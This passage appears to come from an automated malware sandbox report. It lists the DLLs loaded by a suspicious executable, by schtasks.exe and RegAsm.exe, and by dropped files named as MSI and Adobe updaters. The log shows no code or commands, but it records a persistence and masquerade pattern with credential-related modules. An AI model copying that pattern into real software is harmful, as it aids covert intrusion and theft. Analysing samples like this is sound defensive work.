                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: devobj.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeSection loaded: version.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeSection loaded: version.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeSection loaded: vcruntime140_clr0400.dll
